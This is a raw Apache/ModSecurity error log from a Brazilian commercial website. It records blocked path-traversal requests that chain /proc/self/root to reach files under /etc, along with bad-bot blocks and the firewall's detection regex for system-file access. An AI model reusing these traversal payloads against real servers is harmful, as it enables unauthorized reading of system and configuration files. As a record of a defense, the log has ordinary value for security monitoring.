[Mon Mar 16 11:42:11.043513 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:33594] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgWw46lpbStxTqkSktmkQAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:42:45.664145 2026] [:error] [pid 10709:tid 140411540502272] [client 74.7.241.46:33604] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgW5RXjF1vJNtV6CWrxHAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:45:33.348486 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:49198] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgXjBXjF1vJNtV6CWrxcwAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 11:46:21.146048 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.228.16:55982] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgXvf9ocpUE4ed4uDzpOgAAAgo"]
[Mon Mar 16 11:47:43.315164 2026] [:error] [pid 21533:tid 140411708356352] [client 74.7.241.46:34124] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgYD3jZBu2q05ozVU9RxwAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 11:48:49.958197 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.244.31:46388] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgYUI6lpbStxTqkSktnUQAAAkE"]
[Mon Mar 16 11:49:55.939906 2026] [:error] [pid 32654:tid 140411599251200] [client 74.7.243.203:45246] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgYkwlT9VtDQc7bgUyqEgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/initramfs/state/etc
[Mon Mar 16 11:51:21.890943 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.228.16:44500] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgY6f9ocpUE4ed4uDzpkAAAAhU"]
[Mon Mar 16 11:53:49.563225 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.244.31:45444] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgZfdSswJuvopo3lOhZYAAAAIw"]
[Mon Mar 16 11:56:25.010811 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.228.16:44754] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgaGZqj1wV0Si-OkefoCQAAAAU"]
[Mon Mar 16 11:56:45.786873 2026] [mime_magic:error] [pid 21806:tid 140411590858496] (70014)End of file found: [client 74.7.243.203:57806] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root
[Mon Mar 16 11:58:34.789237 2026] [:error] [pid 21805:tid 140411582465792] [client 74.7.241.46:42496] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgamrABkC4fWIHEf8HmpQAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 11:58:49.441142 2026] [:error] [pid 21946:tid 140411716749056] [client 74.7.244.31:43842] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgaqXbQATo66fKoS7xKoAAAAMM"]
[Mon Mar 16 12:01:25.619167 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.228.16:39778] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abgbRXjZBu2q05ozVU9TbgAAAVM"]
[Mon Mar 16 12:02:08.682856 2026] [:error] [pid 32654:tid 140411540502272] [client 74.7.243.203:45054] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbcAlT9VtDQc7bgUysOAAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:10.010264 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:36266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbcrABkC4fWIHEf8HnJQAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:11.228172 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:34528] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbc9SswJuvopo3lOhaWAAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:12.428311 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:34532] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbdHjZBu2q05ozVU9ThQAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:13.602632 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:34538] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbddSswJuvopo3lOhaWgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:15.975159 2026] [:error] [pid 11972:tid 140411599251200] [client 74.7.243.203:34552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbd5qj1wV0Si-OkefpBQAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:17.501014 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.243.203:34560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbeXjZBu2q05ozVU9TiAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:18.808160 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:34562] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbetSswJuvopo3lOhaXQAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:19.995803 2026] [:error] [pid 32654:tid 140411565680384] [client 74.7.243.203:34566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbewlT9VtDQc7bgUysOwAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:22.359874 2026] [:error] [pid 10709:tid 140411733534464] [client 74.7.243.203:59908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbfhXjF1vJNtV6CWry5wAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:24.743133 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:59922] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbf_9ocpUE4ed4uDzqSwAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:26.090904 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:59926] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbgv9ocpUE4ed4uDzqTgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 12:02:27.243532 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:59932] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgbgwlT9VtDQc7bgUysPgAAAQ4"], referer: 